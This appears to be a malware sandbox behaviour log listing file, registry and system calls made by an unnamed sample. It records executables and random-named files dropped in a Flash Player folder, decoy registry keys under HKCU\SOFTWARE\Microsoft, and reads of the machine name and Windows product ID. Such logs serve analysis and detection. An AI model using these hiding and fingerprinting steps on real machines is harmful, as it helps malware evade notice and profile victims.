| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
28 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
28 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
28 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Direct3D |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IMEJP |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Exchange |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Direct3D |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Exchange |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wisp |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wisp |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SQMClient |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Keyboard |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\wfs |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SkyDrive |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Keyboard |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Fax |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Direct3D |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IMEJP |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\FTP |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SQMClient |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Exchange |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Kaev |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SQMClient |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Fax |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Lukuip |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Boteun |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
